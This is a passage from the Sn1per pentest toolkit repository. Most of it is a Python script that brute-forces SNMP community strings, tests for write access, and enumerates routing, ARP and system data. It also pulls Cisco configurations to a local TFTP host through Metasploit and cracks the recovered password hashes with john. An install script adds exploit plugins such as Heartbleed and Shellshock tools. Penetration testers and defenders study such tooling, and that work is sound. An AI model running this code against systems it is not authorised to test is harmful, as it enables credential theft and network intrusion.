215 | 		return self.addr == other.addr and self.version == other.version and self.community == other.community
216 | 
217 | ##########################################################################################################
218 | #	Colour output functions
219 | ##########################################################################################################
220 | 
221 | # for color output
222 | BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
223 | 
224 | #following from Python cookbook, #475186
225 | def has_colours(stream):
226 |     if not hasattr(stream, "isatty"):
227 |         return False
228 |     if not stream.isatty():
229 |         return False # auto color only on TTYs
230 |     try:
231 |         import curses
232 |         curses.setupterm()
233 |         return curses.tigetnum("colors") > 2
234 |     except:
235 |         # guess false in case of error
236 |         return False
237 | has_colours = has_colours(sys.stdout)
238 | 
239 | def printout(text, colour=WHITE):
240 | 
241 | 	if has_colours and defaults.colour:
242 | 			seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m\n"
243 | 			sys.stdout.write(seq)
244 | 	else:
245 | 			#sys.stdout.write(text)
246 | 			print text
247 | 
248 | 
249 | ##########################################################################################################
250 | #	
251 | ##########################################################################################################
252 | 
253 | def banner(art=True):
254 | 	if art:
255 | 		print >> sys.stderr,  "   _____ _   ____  _______     ____             __     "
256 | 		print >> sys.stderr,  "  / ___// | / /  |/  / __ \\   / __ )_______  __/ /____ "
257 | 		print >> sys.stderr,  "  \\__ \\/  |/ / /|_/ / /_/ /  / __  / ___/ / / / __/ _ \\"
258 | 		print >> sys.stderr,  " ___/ / /|  / /  / / ____/  / /_/ / /  / /_/ / /_/  __/"
259 | 		print >> sys.stderr,  "/____/_/ |_/_/  /_/_/      /_____/_/   \\__,_/\\__/\\___/ "
260 | 		print >> sys.stderr,  ""
261 | 		print >> sys.stderr,  "SNMP Bruteforce & Enumeration Script " + __version__
262 | 		print >> sys.stderr,  "http://www.secforce.com / nikos.vassakis <at> secforce.com"
263 | 		print >> sys.stderr, "###############################################################"
264 | 		print >> sys.stderr,  ""
265 | 
266 | def listener(sock,results):
267 | 	while True:
268 | 		try:
269 | 			response,addr=SNMPrecv(sock)
270 | 		except timeout:
271 | 			continue
272 | 		except KeyboardInterrupt:
273 | 			break
274 | 		except:
275 | 			break
276 | 		r=SNMPResults()
277 | 		r.addr=addr
278 | 		r.version=SNMPVersion.sversion(response.version.val)
279 | 		r.community=response.community.val
280 | 		results.append(r)
281 | 		printout (('%s : %s \tVersion (%s):\t%s' % (str(addr[0]),str(addr[1]), SNMPVersion.sversion(response.version.val),response.community.val)),WHITE)
282 | 
283 | def SNMPrecv(sock):
284 | 	try:
285 | 		recv,addr=sock.recvfrom(65535)
286 | 		response = SNMP(recv)
287 | 		return response,addr
288 | 	except:
289 | 		raise
290 | 		
291 | def SNMPsend(sock, packets, ip, port=defaults.port, community='', rate=defaults.rate):
292 | 	addr = (ip, port)
293 | 	for packet in packets:
294 | 		i = randint(0, 2147483647)
295 | 		packet.PDU.id = i
296 | 		packet.community = community
297 | 		sock.sendto(str(packet), addr)
298 | 		sleep(1/rate)
299 | 
300 | def SNMPRequest(result,OID, value='', TimeOut=defaults.timeOut):
301 | 	s = socket(AF_INET, SOCK_DGRAM)
302 | 	s.settimeout(TimeOut)
303 | 	response=''
304 | 	r=result
305 | 
306 | 	version = SNMPVersion.iversion(r.version)
307 | 	if value:
308 | 		p = SNMP(
309 | 			version=version,
310 | 			PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID), value=value)])
311 | 			)
312 | 	else:
313 | 		p = SNMP(
314 | 			version=version,
315 | 			PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID))])
316 | 			)
317 | 
318 | 	SNMPsend(s,p,r.addr[0],r.addr[1],r.community)
319 | 	for x in range(0, 5):
320 | 		try:
321 | 			response,addr=SNMPrecv(s)
322 | 			break
323 | 		except timeout:	# if request times out retry
324 | 			sleep(0.5)
325 | 			continue
326 | 	s.close
327 | 	if not response:
328 | 		raise timeout
329 | 	return response
330 | 
331 | def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
332 | 	#Alt .1.3.6.1.2.1.1.5.0
333 | 
334 | 	setval='HASH(0xDEADBEF)'
335 | 	for r in results:
336 | 		try:
337 | 			originalval=SNMPRequest(r,OID)
338 | 
339 | 			if originalval:
340 | 				originalval=originalval[SNMPvarbind].value.val
341 | 
342 | 				SNMPRequest(r,OID,setval)
343 | 				curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
344 | 
345 | 				if curval == setval:
346 | 					r.write=True
347 | 					try:
348 | 						SNMPRequest(r,OID,originalval)
349 | 					except timeout:
350 | 						pass
351 | 					if options.verbose: printout (('\t %s (%s) (RW)' % (r.community,r.version)),GREEN)
352 | 					curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
353 | 					if curval != originalval:
354 | 						printout(('Couldn\'t restore value to: %s (OID: %s)' % (str(originalval),str(OID))),RED)
355 | 				else:
356 | 					if options.verbose: printout (('\t %s (%s) (R)' % (r.community,r.version)),BLUE)
357 | 			else:
358 | 				r.write=None
359 | 				printout (('\t %s (%s) (Failed)' % (r.community,r.version)),RED)
360 | 		except timeout:
361 | 			r.write=None
362 | 			printout (('\t %s (%s) (Failed!)' % (r.community,r.version)),RED)
363 | 			continue
364 | 
365 | def generic_snmpwalk(snmpwalk_args,oids):
366 | 	for key, val in oids.items():
367 | 		try:
368 | 			printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
369 | 			entry={}
370 | 			out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
371 | 					
372 | 			print '\tINFO'
373 | 			print '\t----\t'
374 | 			for i in out:
375 | 				print '\t',i.strip()
376 | 			print '\n'
377 | 		except KeyboardInterrupt:
378 | 			pass
379 | 
380 | def enumerateSNMPWalk(result,options):
381 | 	r=result
382 | 
383 | 	snmpwalk_args=' -c "'+r.community+'" -'+r.version+' '+str(r.addr[0])+':'+str(r.addr[1])
384 | 
385 | 	############################################################### 	Enumerate OS
386 | 	if options.windows:	
387 | 		generic_snmpwalk(snmpwalk_args,WINDOWS_OIDS)
388 | 		return
389 | 	if options.linux:	
390 | 		generic_snmpwalk(snmpwalk_args,LINUX_OIDS)
391 | 		return
392 | 	if options.cisco:	
393 | 		generic_snmpwalk(snmpwalk_args,CISCO_OIDS)
394 | 	
395 | 	############################################################### 	Enumerate CISCO Specific
396 | 	############################################################### 	Enumerate Routes
397 | 	entry={}
398 | 	out=os.popen('snmpwalk'+snmpwalk_args+' '+'.1.3.6.1.2.1.4.21.1.1'+' '+'| awk \'{print $NF}\' 2>&1''').readlines()
399 | 	lines = len(out)
400 | 
401 | 	printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
402 | 	try:
403 | 		for key, val in RouteOIDS.items():	#Enumerate Routes
404 | 			#print '\t *',val[1], val[0]
405 | 			out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
406 | 			
407 | 			entry[val[1]]=out
408 | 			
409 | 
410 | 		print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
411 | 		print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
412 | 		for j in range(lines):
413 | 			print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
414 | 					'\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
415 | 					'\t'+entry['Mask'][j].strip().ljust(12,' ')  +
416 | 					'\t\t'+entry['Metric'][j].strip().center(6,' ') +
417 | 					'\t'+entry['Interface'][j].strip().center(10,' ') +
418 | 					'\t'+entry['Route type'][j].strip().center(4,' ') +
419 | 					'\t'+entry['Route protocol'][j].strip().center(8,' ') +
420 | 					'\t'+entry['Route age'][j].strip().center(3,' ')
421 | 			)
422 | 	except KeyboardInterrupt:
423 | 		pass
424 | 
425 | 	############################################################### 	Enumerate Arp
426 | 	print '\n'
427 | 	for key, val in ARPOIDS.items():
428 | 		try:
429 | 			printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
430 | 			entry={}
431 | 			out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2 | cut -d\':\' -f 2').readlines()
432 | 
433 | 			lines=len(out)/3
434 | 
435 | 			entry['V']=out[0*lines:1*lines]
436 | 			entry['MAC']=out[1*lines:2*lines]
437 | 			entry['IP']=out[2*lines:3*lines]
438 | 
439 | 			
440 | 			print '\tIP\t\tMAC\t\t\tV'
441 | 			print '\t--\t\t---\t\t\t--'
442 | 			for j in range(lines):
443 | 				print(	'\t'+entry['IP'][j].strip().ljust(12,' ') +
444 | 						'\t'+entry['MAC'][j].strip().ljust(18,' ') +
445 | 						'\t'+entry['V'][j].strip().ljust(2,' ')
446 | 				)
447 | 			print '\n'
448 | 		except KeyboardInterrupt:
449 | 			pass
450 | 
451 | 	############################################################### 	Enumerate SYSTEM
452 | 	for key, val in OIDS.items():
453 | 		try:
454 | 			printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
455 | 			entry={}
456 | 			out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
457 | 					
458 | 			print '\tINFO'
459 | 			print '\t----\t'
460 | 			for i in out:
461 | 				print '\t',i.strip()
462 | 			print '\n'
463 | 		except KeyboardInterrupt:
464 | 			pass
465 | 	############################################################### 	Enumerate Interfaces
466 | 	for key, val in snmpstat_args.items():
467 | 		try:
468 | 			printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
469 | 			out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
470 | 					
471 | 			for i in out:
472 | 				print '\t',i.strip()
473 | 			print '\n'
474 | 		except KeyboardInterrupt:
475 | 			pass
476 | 
477 | def get_cisco_config(result,options):
478 | 	printout(('################## Trying to get config with: %s'% result.community),YELLOW)
479 | 
480 | 	identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
481 | 	
482 | 	if options.interactive:
483 | 		Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
484 | 	else:
485 | 		Local_ip = identified_ip.strip()
486 | 
487 | 	if not (os.path.isdir("./output")):
488 | 		os.popen('mkdir output')
489 | 
490 | 	p=Popen('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
491 | 	
492 | 
493 | 	print 'msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E '
494 | 
495 | 	out=[]
496 | 	while p.poll() is None:
497 | 		line=p.stdout.readline()
498 | 		out.append(line)
499 | 		print '\t',line.strip()
500 | 	
501 | 	printout('################## Passwords Found:',YELLOW)
502 | 	encrypted=[]
503 | 	for i in out:
504 | 		if "Password" in i:
505 | 			print '\t',i.strip()
506 | 		if "Encrypted" in i:
507 | 			encrypted.append(i.split()[-1])
508 | 
509 | 	if encrypted:
510 | 		print '\nCrack encrypted password(s)?'
511 | 		for i in encrypted:
512 | 			print '\t',i
513 | 
514 | 		#if (False if raw_input("(Y/n):").lower() == 'n' else True):
515 | 		if not get_input("(Y/n):",'n',options):
516 | 			
517 | 			with open('./hashes', 'a') as f:
518 | 				for i in encrypted:
519 | 					f.write(i+'\n')
520 | 			
521 | 			p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
522 | 			while p.poll() is None:
523 | 					print '\t',p.stdout.readline()
524 | 			print 'Passwords Cracked:'
525 | 			out=os.popen('john ./hashes --show').readlines()
526 | 			for i in out: 
527 | 				print '\t', i.strip()
528 | 
529 | 	out=[]
530 | 	while p.poll() is None:
531 | 		line=p.stdout.readline()
532 | 		out.append(line)
533 | 		print '\t',line.strip()
534 | 
535 | def select_community(results,options):
536 | 	default=None
537 | 	try:
538 | 		printout("\nIdentified Community strings",WHITE)
539 | 
540 | 		for l,r in enumerate(results):
541 | 			if r.write==True:
542 | 				printout ('\t%s) %s %s (%s)(RW)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),GREEN)
543 | 				default=l
544 | 			elif r.write==False:
545 | 				printout ('\t%s) %s %s (%s)(RO)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),BLUE)
546 | 			else:
547 | 				printout ('\t%s) %s %s (%s)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),RED)
548 | 		
549 | 			if default is None:
550 | 				default = l
551 | 		
552 | 		if not options.enum:
553 | 			return
554 | 		
555 | 		if options.interactive:
556 | 			selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
557 | 			if not selection:
558 | 				selection=default
559 | 		else:
560 | 			selection=default
561 | 			
562 | 		try:
563 | 			return results[int(selection)]
564 | 		except:
565 | 			return results[l]
566 | 	except KeyboardInterrupt:
567 | 		exit(0)
568 | 
569 | def SNMPenumeration(result,options):
570 | 	getcisco=defaults.getcisco
571 | 	try:
572 | 		printout (("\nEnumerating with READ-WRITE Community string: %s (%s)" % (result.community,result.version)),YELLOW)
573 | 		enumerateSNMPWalk(result,options)
574 | 		
575 | 		if options.windows or options.linux:
576 | 			if not get_input("Get Cisco Config (y/N):",'y',options):
577 | 				getcisco=False
578 | 		if getcisco: 
579 | 			get_cisco_config(result,options)
580 | 	except KeyboardInterrupt:
581 | 		print '\n'
582 | 		return
583 | 
584 | def password_brutefore(options, communities, ips):
585 | 	s = socket(AF_INET, SOCK_DGRAM)
586 | 	s.settimeout(options.timeOut)
587 | 
588 | 	results=[]
589 | 	
590 | 	#Start the listener
591 | 	T = threading.Thread(name='listener', target=listener, args=(s,results,))
592 | 	T.start()
593 | 	
594 | 	# Craft SNMP's for both versions
595 | 	p1 = SNMP(
596 | 		version=SNMPVersion.iversion('v1'),
597 | 		PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
598 | 		)
599 | 	p2c = SNMP(
600 | 		version=SNMPVersion.iversion('v2c'),
601 | 		PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
602 | 		)
603 | 
604 | 	packets = [p1, p2c]
605 | 
606 | 	#We try each community string
607 | 	for i,community in enumerate(communities):
608 | 		#sys.stdout.write('\r{0}'.format('.' * i))
609 | 		#sys.stdout.flush()
610 | 		for ip in ips:
611 | 			SNMPsend(s, packets, ip, options.port, community.rstrip(), options.rate)
612 | 
613 | 	#We read from STDIN if necessary
614 | 	if options.stdin:
615 | 		while True:
616 | 			try:
617 | 				try:
618 | 					community=raw_input().strip('\n')
619 | 					for ip in ips:
620 | 						SNMPsend(s, packets, ip, options.port, community, options.rate)
621 | 				except EOFError:
622 | 					break				
623 | 			except KeyboardInterrupt:
624 | 				break
625 | 
626 | 	try:
627 | 		print "Waiting for late packets (CTRL+C to stop)"
628 | 		sleep(options.timeOut+options.delay)	#Waiting in case of late response
629 | 	except KeyboardInterrupt:
630 | 		pass
631 | 	T._Thread__stop()
632 | 	s.close
633 | 
634 | 	#We remove any duplicates. This relies on the __equal__
635 | 	newlist = []
636 | 	for i in results:
637 | 		if i not in newlist:
638 | 			newlist.append(i)
639 | 	return newlist
640 | 
641 | def get_input(string,non_default_option,options):
642 | 	#(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
643 | 	
644 | 	if options.interactive:
645 | 		if raw_input(string).lower() == non_default_option:
646 | 			return True
647 | 		else:
648 | 			return False
649 | 	else:
650 | 		print string
651 | 		return False
652 | 
653 | def main():
654 | 
655 | 	parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter())
656 | 
657 | 	parser.set_usage("python snmp-brute.py -t <IP> -f <DICTIONARY>")
658 | 	#parser.add_option('-h','--help', help='Show this help message and exit', action=parser.print_help())
659 | 	parser.add_option('-f','--file', help='Dictionary file', dest='dictionary', action='store')
660 | 	parser.add_option('-t','--target', help='Host IP', dest='ip', action='store')
661 | 	parser.add_option('-p','--port', help='SNMP port', dest='port', action='store', type='int',default=defaults.port)
662 | 	
663 | 
664 | 	groupAlt = optparse.OptionGroup(parser, "Alternative Options")
665 | 	groupAlt.add_option('-s','--stdin', help='Read communities from stdin', dest='stdin', action='store_true',default=False)
666 | 	groupAlt.add_option('-c','--community', help='Single Community String to use', dest='community', action='store')
667 | 	groupAlt.add_option('--sploitego', help='Sploitego\'s bruteforce method', dest='sploitego', action='store_true',default=False)
668 | 
669 | 
670 | 	groupAuto = optparse.OptionGroup(parser, "Automation")
671 | 	groupAuto.add_option('-b','--bruteonly', help='Do not try to enumerate - only bruteforce', dest='enum', action='store_false',default=True)
672 | 	groupAuto.add_option('-a','--auto', help='Non Interactive Mode', dest='interactive', action='store_false',default=True)
673 | 	groupAuto.add_option('--no-colours', help='No colour output', dest='colour', action='store_false',default=True)
674 | 
675 | 	groupAdvanced = optparse.OptionGroup(parser, "Advanced")
676 | 	groupAdvanced.add_option('-r','--rate', help='Send rate', dest='rate', action='store',type='float', default=defaults.rate)
677 | 	groupAdvanced.add_option('--timeout', help='Wait time for UDP response (in seconds)', dest='timeOut', action='store', type='float' ,default=defaults.timeOut)
678 | 	groupAdvanced.add_option('--delay', help='Wait time after all packets are send (in seconds)', dest='delay', action='store', type='float' ,default=defaults.delay)
679 | 
680 | 	groupAdvanced.add_option('--iplist', help='IP list file', dest='lfile', action='store')
681 | 	groupAdvanced.add_option('-v','--verbose', help='Verbose output', dest='verbose', action='store_true',default=False)
682 | 
683 | 	groupOS = optparse.OptionGroup(parser, "Operating Systems")
684 | 	groupOS.add_option('--windows', help='Enumerate Windows OIDs (snmpenum.pl)', dest='windows', action='store_true',default=False)
685 | 	groupOS.add_option('--linux', help='Enumerate Linux OIDs (snmpenum.pl)', dest='linux', action='store_true',default=False)
686 | 	groupOS.add_option('--cisco', help='Append extra Cisco OIDs (snmpenum.pl)', dest='cisco', action='store_true',default=False)
687 | 
688 | 	parser.add_option_group(groupAdvanced)
689 | 	parser.add_option_group(groupAuto)
690 | 	parser.add_option_group(groupOS)
691 | 	parser.add_option_group(groupAlt)
692 | 
693 | 	(options, arguments) = parser.parse_args()
694 | 
695 | 	communities=[]
696 | 	ips=[]
697 | 
698 | 	banner(options.colour)	#For SPARTA!!!
699 | 	
700 | 	if not options.ip and not options.lfile:
701 | 		#Can't continue without target
702 | 		parser.print_help()
703 | 		exit(0)
704 | 	else:
705 | 		# Create the list of targets
706 | 		if options.lfile:
707 | 			try:
708 | 				with open(options.lfile) as t:
709 | 					ips = t.read().splitlines()	#Potential DoS
710 | 			except:
711 | 				print "Could not open targets file: " + options.lfile
712 | 				exit(0)
713 | 		else:
714 | 			ips.append(options.ip)
715 | 
716 | 	if not options.colour:
717 | 			defaults.colour=False
718 | 
719 | 	# Create the list of communities
720 | 	if options.dictionary:	# Read from file
721 | 		with open(options.dictionary) as f:
722 | 			communities=f.read().splitlines()	#Potential DoS
723 | 	elif options.community:	# Single community
724 | 		communities.append(options.community)
725 | 	elif options.stdin:		# Read from input
726 | 		communities=[]
727 | 	else:	#if not options.community and not options.dictionary and not options.stdin:
728 | 		communities=default_communities
729 | 
730 | 	#We ensure that default communities are included
731 | 	#if 'public' not in communities:
732 | 	#	communities.append('public')
733 | 	#if 'private' not in communities:
734 | 	#	communities.append('private')
735 | 
736 | 	if options.stdin:
737 | 		options.interactive=False
738 | 
739 | 	results=[]
740 | 
741 | 	if options.stdin:
742 | 		print >> sys.stderr, "Reading input for community strings ..."
743 | 	else:
744 | 		print >> sys.stderr, "Trying %d community strings ..." % len(communities)
745 | 
746 | 	if options.sploitego: #sploitego method of bruteforce
747 | 		if ips:
748 | 			for ip in ips:
749 | 				for version in ['v1', 'v2c']:
750 | 					bf = SNMPBruteForcer(ip, options.port, version, options.timeOut,options.rate)
751 | 					result=bf.guess(communities)
752 | 					for i in result:
753 | 						r=SNMPResults()
754 | 						r.addr=(ip,options.port)
755 | 						r.version=version
756 | 						r.community=i
757 | 						results.append(r)
758 | 					print ip, version+'\t',result
759 | 		else:
760 | 			parser.print_help()
761 | 
762 | 	else:
763 | 		results = password_brutefore(options, communities, ips)
764 | 
765 | 	#We identify whether the community strings are read or write
766 | 	if results:
767 | 		printout("\nTrying identified strings for READ-WRITE ...",WHITE)
768 | 		testSNMPWrite(results,options)	
769 | 	else:
770 | 		printout("\nNo Community strings found",RED)
771 | 		exit(0)
772 | 	
773 | 	#We attempt to enumerate the router
774 | 	while options.enum:
775 | 		SNMPenumeration(select_community(results,options),options)
776 | 
777 | 		#if (True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False):
778 | 		if get_input("Enumerate with different community? (y/N):",'y',options):
779 | 			continue
780 | 		else:
781 | 			break
782 | 		
783 | 	if not options.enum:
784 | 		select_community(results,options)
785 | 			
786 | 		print "Finished!"
787 | 
788 | if __name__ == "__main__":
789 | 	main()
790 | 


--------------------------------------------------------------------------------
/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # build script to push to github... 
3 | git add *
4 | git commit -m 'Sn1per by 1N3CrowdShield'
5 | git push origin master
6 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # Install script for sn1per
  3 | #
  4 | # VARS
  5 | OKBLUE='\033[94m'
  6 | OKRED='\033[91m'
  7 | OKGREEN='\033[92m'
  8 | OKORANGE='\033[93m'
  9 | RESET='\e[0m'
 10 | 
 11 | echo -e "$OKRED                ____               $RESET"
 12 | echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 13 | echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 14 | echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 15 | echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 16 | echo -e "$OKRED               /_/                 $RESET"
 17 | echo -e "$RESET"
 18 | echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 19 | echo ""
 20 | 
 21 | INSTALL_DIR=/usr/share/sniper
 22 | LOOT_DIR=/usr/share/sniper/loot
 23 | PLUGINS_DIR=/usr/share/sniper/plugins
 24 | 
 25 | echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
 26 | read answer 
 27 | 
 28 | mkdir -p $INSTALL_DIR 2> /dev/null
 29 | mkdir -p $LOOT_DIR 2> /dev/null
 30 | mkdir $LOOT_DIR/domains 2> /dev/null
 31 | mkdir $LOOT_DIR/screenshots 2> /dev/null
 32 | mkdir $LOOT_DIR/nmap 2> /dev/null
 33 | mkdir $LOOT_DIR/reports 2> /dev/null
 34 | mkdir $LOOT_DIR/output 2> /dev/null
 35 | cp -Rf $PWD/* $INSTALL_DIR 2> /dev/null
 36 | cd $INSTALL_DIR
 37 | 
 38 | echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
 39 | apt-get install ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
 40 | pip install dnspython colorama tldextract urllib3 ipaddress
 41 | 
 42 | echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 43 | gem install rake
 44 | gem install ruby-nmap net-http-persistent mechanize text-table
 45 | 
 46 | echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
 47 | rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
 48 | mkdir $PLUGINS_DIR 2> /dev/null
 49 | cd $PLUGINS_DIR
 50 | mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
 51 | 
 52 | echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
 53 | git clone https://github.com/1N3/Findsploit.git 
 54 | git clone https://github.com/1N3/BruteX.git 
 55 | git clone https://github.com/1N3/Goohak.git 
 56 | git clone https://github.com/1N3/XSSTracer.git 
 57 | git clone https://github.com/1N3/MassBleed.git 
 58 | git clone https://github.com/1N3/SuperMicro-Password-Scanner 
 59 | git clone https://github.com/Dionach/CMSmap.git 
 60 | git clone https://github.com/0xsauby/yasuo.git 
 61 | git clone https://github.com/johndekroon/serializekiller.git 
 62 | git clone https://github.com/aboul3la/Sublist3r.git 
 63 | git clone https://github.com/nccgroup/shocker.git 
 64 | git clone --depth 1 https://github.com/drwetter/testssl.sh.git 
 65 | git clone https://github.com/lunarca/SimpleEmailSpoofer 
 66 | git clone https://github.com/arthepsy/ssh-audit 
 67 | git clone https://github.com/m0rtem/CloudFail.git
 68 | wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
 69 | wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d496c730934965/scripts/http-vuln-INTEL-SA-00075.nse -O /usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse
 70 | cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
 71 | echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
 72 | cd $PLUGINS_DIR/CloudFail/ && apt-get install python3-pip && pip3 install -r requirements.txt
 73 | cd $PLUGINS_DIR/Findsploit/ && bash install.sh
 74 | cd $PLUGINS_DIR/BruteX/ && bash install.sh
 75 | cd $INSTALL_DIR 
 76 | mkdir $LOOT_DIR 2> /dev/null
 77 | mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
 78 | mkdir $LOOT_DIR/nmap -p 2> /dev/null
 79 | mkdir $LOOT_DIR/domains -p 2> /dev/null
 80 | mkdir $LOOT_DIR/output -p 2> /dev/null
 81 | mkdir $LOOT_DIR/reports -p 2> /dev/null
 82 | cp -f $INSTALL_DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
 83 | chmod +x $INSTALL_DIR/sniper
 84 | chmod +x $INSTALL_DIR/bin/dnsdict6
 85 | chmod +x $PLUGINS_DIR/Goohak/goohak
 86 | chmod +x $PLUGINS_DIR/XSSTracer/xsstracer.py
 87 | chmod +x $PLUGINS_DIR/MassBleed/massbleed
 88 | chmod +x $PLUGINS_DIR/MassBleed/heartbleed.py
 89 | chmod +x $PLUGINS_DIR/MassBleed/openssl_ccs.pl
 90 | chmod +x $PLUGINS_DIR/MassBleed/winshock.sh 
 91 | chmod +x $PLUGINS_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
 92 | chmod +x $PLUGINS_DIR/testssl.sh/testssl.sh
 93 | rm -f /usr/bin/sniper
 94 | rm -f /usr/bin/goohak
 95 | rm -f /usr/bin/xsstracer
 96 | rm -f /usr/bin/findsploit
 97 | rm -f /usr/bin/copysploit
 98 | rm -f /usr/bin/compilesploit
 99 | rm -f /usr/bin/massbleed
100 | rm -f /usr/bin/testssl
101 | ln -s $INSTALL_DIR/sniper /usr/bin/sniper
102 | ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak
103 | ln -s $PLUGINS_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
104 | ln -s $PLUGINS_DIR/Findsploit/findsploit /usr/bin/findsploit
105 | ln -s $PLUGINS_DIR/Findsploit/copysploit /usr/bin/copysploit
106 | ln -s $PLUGINS_DIR/Findsploit/compilesploit /usr/bin/compilesploit
107 | ln -s $PLUGINS_DIR/MassBleed/massbleed /usr/bin/massbleed
108 | ln -s $PLUGINS_DIR/testssl.sh/testssl.sh /usr/bin/testssl
109 | echo -e "$OKORANGE + -- --=[Done!$RESET"
110 | echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"


--------------------------------------------------------------------------------
/loot/README.md:
--------------------------------------------------------------------------------
1 | # Sn1per - Automated Pentest Recon Scanner
2 | ![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png)
3 | 


--------------------------------------------------------------------------------
/sniper:
--------------------------------------------------------------------------------
   1 | #!/bin/bash
   2 | # + -- --=[Sn1per by 1N3
   3 | # + -- --=[http://crowdshield.com
   4 | #
   5 | ## ABOUT:
   6 | #Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.
   7 | 
   8 | ## DEMO VIDEO:
   9 | #[![Sn1per Demo](https://img.youtube.com/vi/nA_V_u3QZA4/0.jpg)](https://www.youtube.com/watch?v=nA_V_u3QZA4)
  10 | 
  11 | ## FEATURES:
  12 | #* Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  13 | #* Automatically launches Google hacking queries against a target domain
  14 | #* Automatically enumerates open ports via NMap port scanning
  15 | #* Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
  16 | #* Automatically checks for sub-domain hijacking
  17 | #* Automatically runs targeted NMap scripts against open ports
  18 | #* Automatically runs targeted Metasploit scan and exploit modules
